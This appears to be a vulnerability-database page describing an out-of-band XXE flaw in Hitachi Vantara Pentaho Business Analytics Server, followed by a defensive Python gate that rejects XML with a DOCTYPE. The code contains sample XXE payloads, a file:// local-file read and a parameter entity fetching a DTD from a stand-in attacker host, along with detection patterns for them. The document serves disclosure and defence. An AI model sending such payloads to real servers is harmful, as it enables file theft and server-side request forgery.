Hitachi Vantara Pentaho Business Analytics Server - Improper Restriction of XML External Entity Reference
Description
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x, do not correctly protect the Post Analysis service endpoint of the data access plugin against out-of-band XML External Entity Reference.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Hitachi Vantara Pentaho BA Server before 9.4.0.1 and 9.3.0.2 fails to protect the Post Analysis service endpoint against out-of-band XML external entity (XXE) attacks.
Vulnerability
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including all 8.3.x releases, do not correctly protect the Post Analysis service endpoint of the data access plugin against out-of-band XML External Entity Reference (XXE) attacks [1]. The flaw exists because the endpoint processes XML documents that may contain a Document Type Definition (DTD) allowing external entity definitions without proper restrictions.
Exploitation
An authenticated attacker can submit a crafted XML file to the vulnerable Post Analysis service endpoint [1]. The XML file defines an external entity using a URI with schemes such as file:// or http://. The server then processes the entity and may echo the retrieved data back in an error message or other response. No additional privileges beyond standard authentication are required; the attacker only needs network access to the affected service.
Impact
Successful exploitation allows an attacker to read arbitrary local files from the server (e.g., via file:// URI), potentially exposing sensitive configuration or data. Using http:// or other URI schemes, the attacker can force the server to make outgoing requests to internal or external hosts, enabling port scanning or other reconnaissance from the server's network position [1]. This constitutes information disclosure and can be used to bypass firewalls or hide the attack source.
Mitigation
As a workaround, the data access plugin can be removed from the software installation to mitigate the defect. The vendor recommends upgrading to Hitachi Vantara Pentaho Business Analytics Server version 9.3.0.2 (Long Term Support) or 9.4.0.1 or newer [1]. The fix is included in those releases. No information about CVE listing in CISA KEV is provided in the references.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
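The Exploitation and Mitigation paragraphs above describe an endpoint that accepts XML carrying a DTD with external entities pointing at file:// or http:// URIs. The following is an added example, not Pentaho code and not the vendor's fix: a defensive pre-parse gate that refuses any XML body containing a DOCTYPE before it reaches a parser, and extracts the scheme of each external entity the DTD declared so the rejection can be logged and alerted on. The function names (inspect_xml, parse_untrusted), the XmlCheck result type and the three sample request bodies are all constructed for this example; the gate assumes the body has already been decoded to text.

```python
"""Defensive pre-parse gate for XML request bodies (added example, not Pentaho code).

Policy: an XML body that carries any DOCTYPE is rejected before it reaches a
parser, and any external entity declarations it contains are extracted so the
rejection can be logged with the URI scheme the entity pointed at (file://
for local file reads, http:// for out-of-band requests).
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Any document type declaration: the policy is to allow none at all.
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# External (SYSTEM or PUBLIC) entity declaration inside a DTD, general or
# parameter (%) entity, with either quote style around the identifier, e.g.
#   <!ENTITY xxe SYSTEM "file:///path/to/file">
#   <!ENTITY % remote SYSTEM 'http://host.invalid/evil.dtd'>
_EXTERNAL_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))\s+"
    r"(?P<q>[\"'])(?P<uri>[^\"']*)(?P=q)",
    re.IGNORECASE,
)


@dataclass
class XmlCheck:
    accepted: bool
    reason: str
    # (scheme, uri) for each external entity declared, for logging/alerting
    external_uris: list[tuple[str, str]] = field(default_factory=list)


def inspect_xml(body: str) -> XmlCheck:
    """Classify a decoded XML body without parsing it."""
    if not _DOCTYPE.search(body):
        return XmlCheck(True, "no DTD")
    uris = []
    for m in _EXTERNAL_ENTITY.finditer(body):
        uri = m.group("uri")
        scheme = urlsplit(uri).scheme.lower() or "relative"
        uris.append((scheme, uri))
    if uris:
        return XmlCheck(False, "DTD declares external entities", uris)
    # Internal-only DTDs are still refused: entity expansion attacks need no
    # external reference, and the endpoint has no legitimate use for a DTD.
    return XmlCheck(False, "DTD present")


def parse_untrusted(body: str) -> ET.Element:
    """Parse only after the gate accepts the body."""
    check = inspect_xml(body)
    if not check.accepted:
        raise ValueError(f"rejected XML body: {check.reason} {check.external_uris}")
    return ET.fromstring(body)


# Constructed sample request bodies (not captured traffic).
BENIGN_BODY = '<?xml version="1.0"?><analysis><query>select 1</query></analysis>'

FILE_READ_BODY = """<?xml version="1.0"?>
<!DOCTYPE analysis [
  <!ENTITY xxe SYSTEM "file:///path/on/server/config.xml">
]>
<analysis><query>&xxe;</query></analysis>"""

OOB_BODY = """<?xml version="1.0"?>
<!DOCTYPE analysis [
  <!ENTITY % remote SYSTEM 'http://oob.example.invalid/evil.dtd'>
  %remote;
]>
<analysis/>"""


if __name__ == "__main__":
    samples = [("benign", BENIGN_BODY), ("file-read", FILE_READ_BODY), ("out-of-band", OOB_BODY)]
    for label, body in samples:
        result = inspect_xml(body)
        verdict = "accept" if result.accepted else "REJECT"
        print(f"{label:12} {verdict:7} {result.reason} {result.external_uris}")
```

This gate is defence in depth at the request boundary, not a substitute for the fixed releases named above. Inside a Java application such as this server, the parser-level equivalent is to disallow DOCTYPE outright, for example with `DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`, so that no entity declaration is ever processed regardless of what reaches the parser. Because the gate inspects decoded text, bodies arriving in an unexpected encoding must be decoded before the check, otherwise the literal `<!DOCTYPE` would not be seen.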
Affected products (2)
- Range: <9.4.0.1 and <9.3.0.2, including 8.3.x
- Range: 1.0
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (1)
News mentions (0)
No linked articles in our index yet.